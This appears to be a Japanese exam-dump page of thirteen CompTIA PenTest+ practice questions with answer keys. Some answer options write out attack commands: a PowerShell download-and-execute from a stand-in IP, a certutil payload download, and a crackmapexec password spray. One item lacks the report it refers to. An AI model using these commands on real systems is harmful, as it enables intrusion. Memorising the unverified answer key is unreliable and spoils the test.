PT0-003無料問題集「CompTIA PenTest+」

質問 1

A penetration tester identifies the following open ports during a network enumeration scan:
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
111/tcp open rpcbind
443/tcp open https
27017/tcp open mongodb
50123/tcp open ms-rpc
Which of the following commands did the tester use to get this output?

（A）nmap -sV -Pn -p- 10.10.10.10

（B）nmap -sV 10.10.10.10

（C）nmap -Pn -A 10.10.10.10

（D）nmap -Pn -w 10.10.10.10

正解：A 解答を投票する

解説: (JPNTest メンバーにのみ表示されます)

質問 2

A penetration tester is getting ready to conduct a vulnerability scan as part of the testing process. The tester will evaluate an environment that consists of a container orchestration cluster. Which of the following tools should the tester use to evaluate the cluster?

（A）Trivy

（B）Kube-hunter

（C）Nessus

（D）Grype

正解：B 解答を投票する

解説: (JPNTest メンバーにのみ表示されます)

質問 3

A penetration tester completes a scan and sees the following output on a host:
bash
Copy code
Nmap scan report for victim (10.10.10.10)
Host is up (0.0001s latency)
PORT STATE SERVICE
161/udp open|filtered snmp
445/tcp open microsoft-ds
3389/tcp open microsoft-ds
Running Microsoft Windows 7
OS CPE: cpe:/o:microsoft:windows_7_sp0
The tester wants to obtain shell access. Which of the following related exploits should the tester try first?

（A）exploit/windows/smb/ms08_067_netapi

（B）auxiliary/scanner/snmp/snmp_login

（C）exploit/windows/smb/ms17_010_eternalblue

（D）exploit/windows/smb/psexec

正解：C 解答を投票する

解説: (JPNTest メンバーにのみ表示されます)

質問 4

Which of the following tasks would ensure the key outputs from a penetration test are not lost as part of the cleanup and restoration activities?

（A）Reverting configuration changes

（B）Keeping chain of custody

（C）Preserving artifacts

（D）Exporting credential data

正解：C 解答を投票する

解説: (JPNTest メンバーにのみ表示されます)

質問 5

A penetration tester completed OSINT work and needs to identify all subdomains for mydomain.com.
Which of the following is the best command for the tester to use?

（A）dig @8.8.8.8 mydomain.com ANY » /path/to/results.txt

（B）cat wordlist.txt | xargs -n 1 -I 'X' dig X.mydomain.com

（C）crunch 1 2 | xargs -n 1 -I 'X' nslookup X.mydomain.com

（D）nslookup mydomain.com » /path/to/results.txt

正解：B 解答を投票する

解説: (JPNTest メンバーにのみ表示されます)

質問 6

A penetration tester gains initial access to an endpoint and needs to execute a payload to obtain additional access. Which of the following commands should the penetration tester use?

（A）powershell.exe impo C:\tools\foo.ps1

（B）powershell.exe -noni -encode IEX.Downloadstring("http://172.16.0.1/")

（C）rundll32.exe c:\path\foo.dll,functName

（D）certutil.exe -f https://192.168.0.1/foo.exe bad.exe

正解：D 解答を投票する

解説: (JPNTest メンバーにのみ表示されます)

質問 7

During an engagement, a penetration tester found some weaknesses that were common across the customer's entire environment. The weaknesses included the following:
* Weaker password settings than the company standard
* Systems without the company's endpoint security software installed
* Operating systems that were not updated by the patch management system Which of the following recommendations should the penetration tester provide to address the root issue?

（A）Add all systems to the vulnerability management system.

（B）Patch the out-of-date operating systems.

（C）Implement a configuration management system.

（D）Deploy an endpoint detection and response system.

正解：C 解答を投票する

解説: (JPNTest メンバーにのみ表示されます)

質問 8

Which of the following is a term used to describe a situation in which a penetration tester bypasses physical access controls and gains access to a facility by entering at the same time as an employee?

（A）Badge cloning

（B）Tailgating

（C）Site survey

（D）Shoulder surfing

正解：B 解答を投票する

解説: (JPNTest メンバーにのみ表示されます)

質問 9

While performing an internal assessment, a tester uses the following command:
crackmapexec smb 192.168.1.0/24 -u user.txt -p Summer123@
Which of the following is the main purpose of the command?

（A）To perform a pass-the-hash attack over multiple endpoints within the internal network

（B）To perform password spraying on internal systems

（C）To execute a command in multiple endpoints at the same time

（D）To perform common protocol scanning within the internal network

正解：B 解答を投票する

解説: (JPNTest メンバーにのみ表示されます)

質問 10

A penetration tester assesses a complex web application and wants to explore potential security weaknesses by searching for subdomains that might have existed in the past. Which of the following tools should the penetration tester use?

（A）Shodan

（B）SpiderFoot

（C）Wayback Machine

（D）Censys.io

正解：C 解答を投票する

解説: (JPNTest メンバーにのみ表示されます)

質問 11

A penetration tester must identify vulnerabilities within an ICS (Industrial Control System) that is not connected to the internet or enterprise network. Which of the following should the tester utilize to conduct the testing?

（A）Stealth scans

（B）Manual assessment

（C）Source code analysis

（D）Channel scanning

正解：B 解答を投票する

解説: (JPNTest メンバーにのみ表示されます)

質問 12

A penetration tester runs a vulnerability scan that identifies several issues across numerous customer hosts.
The executive report outlines the following:

The client is concerned about the availability of its consumer-facing production application. Which of the following hosts should the penetration tester select for additional manual testing?

（A）Server 3

（B）Server 2

（C）Server 4

（D）Server 1

正解：A 解答を投票する

解説: (JPNTest メンバーにのみ表示されます)

質問 13

While conducting an assessment, a penetration tester identifies details for several unreleased products announced at a company-wide meeting.
Which of the following attacks did the tester most likely use to discover this information?

（A）SQL injection attack

（B）Credential harvesting

（C）Eavesdropping

（D）Bluesnarfing

正解：C 解答を投票する

解説: (JPNTest メンバーにのみ表示されます)

PT0-003 無料問題集「CompTIA PenTest+」

弊社を連絡する

関連リンク

トップ試験